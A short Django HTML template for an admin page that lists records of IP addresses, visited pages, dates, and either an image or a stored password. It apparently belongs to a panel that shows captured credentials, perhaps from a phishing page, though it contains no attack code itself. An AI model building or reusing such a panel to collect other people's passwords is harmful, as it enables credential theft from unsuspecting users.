{% extends 'adminbase.html' %}
{% block content %}


<!-- Begin Page Content -->
<div class="container"  >
 

<div  class="dpace">

  <table  id="order-listing" class=" table justify-content-center" >
  <thead class="table-light">
    <tr>
      {% for i in head %}
      <th scope="col">{{ i }}</th>
      {% endfor %}
    </tr>
  </thead>
  <tbody>
    {% for i in ids %}
    <tr>
      <td scope="row">{{ i.id }}</td>
      
      <td scope="row">{{ i.ipaddrs }}</td>
      <td scope="row">{{ i.page }}</td>
      <td scope="row">{{ i.Date }}</td>
    {% if i.Img %}
    <td scope="row"><img src="{{ i.Img }}" height="50px" width="50px"></img></td>
    {% else %}
      <td scope="row">{{ i.passwd }}</td>
    {% endif %}
    </tr>
    {% endfor %}
  </tbody>
</table>
</div>
</div>

   

{% endblock %}